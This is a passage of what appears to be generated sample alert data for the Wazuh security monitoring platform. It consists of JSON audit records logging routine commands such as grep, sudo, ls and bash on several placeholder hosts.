/usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: 